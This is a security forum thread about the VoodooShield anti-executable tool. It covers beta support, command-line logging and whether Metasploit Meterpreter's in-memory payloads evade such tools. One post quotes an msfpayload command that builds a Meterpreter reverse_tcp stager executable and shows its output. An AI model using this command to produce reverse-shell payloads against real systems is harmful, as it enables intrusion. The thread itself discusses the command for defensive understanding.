VoodooShield ?

Thank you, and obviously we appreciate this very much too .

 

Can you tell a bit more about this, isn't this in fact comparable with in-memory malware? The payload (meterpreter) works from inside the exploited process, and that's why anti-exe can't block it, am I correct?

 

Do you guys maybe want to start a new thread and have a general discussion about this? I do think it is an important topic to discuss, but I think if we start a new thread, other developers will be more comfortable in joining the conversation and offering their valuable insights? Just a thought!

 

Curious, is there an 'envisioned' time table for when Release version 3 will be available through GUI upgrade from v. 2.75 (ie: weeks, months, a year.)

 

Vlad will be able to give you a better idea than I can when he returns from vacation, but I imagine a month or so. Thank you!

 

Dan look for an email!

Daniel

 

There is already a thread over here:

https://www.wilderssecurity.com/thre...r-edetection-any-antimalware-software.379698/

 

No, Thank you!

 

This is not unusual behavior for any AV. The log is not showing the complete details.

Right now, there is problem with VS not recording complete command lines. (e.g. VS does not log all blocked command lines, there is no real-time list of command lines)

There is problem with VS not alerting user about block actions in some instances.

There is no way to lookup blocks and white-list if legitimate (e.g. select command line block from real-time list, add to white list).

Big usability problem...

 

No. Someone needs to provide a verifiable sample or PoC... because until someone can prove a bypass with an actual sample - that is verified by others via testing - it is nothing but speculation. Another discussion is going to only degenerate into another messy debate and verbal melee \ flame war...

 

Completely agree with that...and as you say best we avoid going any further with discussions along those lines.

 

Win 7 - VS in Smart Mode.
I get one of these whenever I open Explorer?
Edit: 3.02 Beta

 

Basically yes, except Metasploit Meterpreter does not need any actual malware. Hence there is no file being executed and nothing for an anti-executable to detect.

With that said, I agree with Dan that if more debate about this is needed, it should be done in a new thread. Please point me to it if you decide to create one.

For those still asking for “proof”, I'll copy-paste my previous reply #8052:
“To those wanting some sort of "proof" I will point out that this method is nothing fancy. It's out there for all to see. It's basically just how a Metasploit interpreter works. Metasploit is build into Kali Linux which is completely free, so anyone who knows how to use Metasploit should be able to reproduce it. Not that I see why it would be needed. After all, when there is no executable, how is an anti-executable supposed to block the attack?”

 

Great article here on explaining how Meterpreter works: https://www.sans.org/reading-room/whitepapers/forensics/analysis-meterpreter-post-exploitation-35537

-EDIT- The key to stopping this is by detecting the stager. After that it's game over since everything thereafter is done in memory.

Analysis began with the stager, which was created by the msfpayload utility shown below. This command will embed a Metasploit payload into several formats including code such as C and JS as well as executables and DLLs. The stager executable is small, just over 70K, regardless of the transport method selected.


root@kali:~# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.36.128 LPORT=9002 X >
./payloads/meterpreter_reverse_tcp.exe


Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"192.168.36.128", "LPORT"=>"9002”}

​

 

Wow... this is crazy. I actually have a client whose cell phone was infected.

https://www.youtube.com/watch?v=1u9xswfXwXU&feature=youtu.be

 

I still use my 12 year old pay-as-you-go Verizon cell phone. All I have to do is pay at least $5 a month and I keep all my rollover minutes. Actually, it still has the original battery in the thing. It has excellent reception all over the U.S..

 

Or they can lock the device while a web app is running, right .

 

Yeah, that would be even better!

 

Sorry about that... Vlad will be back tomorrow and he will most likely focus on the command lines. Do you guys remember how I had a difficult time getting the command lines just right? And actually, I never did get them just right in VS 2.86. So the command lines are kind of in a transition while he reworks the code, so it may take a week or two to work everything out and get them working perfectly.

 

Yeah, it will be a very interesting discussion, hopefully with a healthy dose of PoC's. I really would like to see what other developers and exploit experts think as well.

 

Yeah, it is essentially the same thing as the cmd issue that I could never get exactly right, but he will fix it, I promise .

 

I am talking about executable malware, like the example in the video that I posted... in the video, she says “One thing to remember is that these infections got on these iPhones by users clicking on a link to download an app to their iPhone, not from users downloading things from the App Store.”

In iOS, Apps must be approved for the camera and mic to have access. Whether this can be exploited or not, who knows?

If turning the lock off is a concern, then you either add an additional deny by default prompt, or just hide the desktop shield gadget altogether (for novices).

Either way, I believe that the device should be locked when a web app is running, and unlocked when all of the web apps are closed, so that the device is usable. Keep in mind, the lock can include other locking mechanisms other than whitelisting... like anti-exploit, etc, but the core locking mechanism should be whitelisting in my opinion. Also, keep in mind, currently iOS 8 and below essentially blocks any apps that are not provided by the app store, which is not unlike blocking by digital signature... which is exactly why VS does not allow by digital signature, unless the initial parent process is allowed.

According to the video, it sounds like Apple added additional protections in iOS 9, so for now this issue is fixed... so I would be curious what these protections are, and how effective they are compared to whitelisting and auto building the whitelist with toggling / snapshots.

 

I am 3.02 beta.. whitelisted and took snapshot.. but whenever I right click to open the folder in internet download manager for a downloaded item.. i get this.. I have allowed it n times.
http://nium.co/images/f429afaebc.png
should I white list rundll in settings?